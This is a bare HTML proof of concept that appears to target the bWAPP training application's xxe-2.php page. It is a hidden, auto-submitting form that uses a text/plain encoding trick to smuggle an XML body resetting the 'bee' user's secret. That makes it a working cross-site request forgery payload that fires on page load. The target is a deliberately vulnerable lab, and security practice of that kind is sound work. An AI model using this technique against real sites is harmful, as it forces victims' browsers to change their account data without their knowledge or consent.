<FORM NAME="buy" ENCTYPE="text/plain"
action="http://bwapp/bWAPP/xxe-2.php" METHOD="POST">
<input type="hidden" name='<?xml version'
value='"1.0"?><reset><login>bee</login><secret>aaaaaaa</secret></reset>'>
</FORM>
<script>document.buy.submit();</script>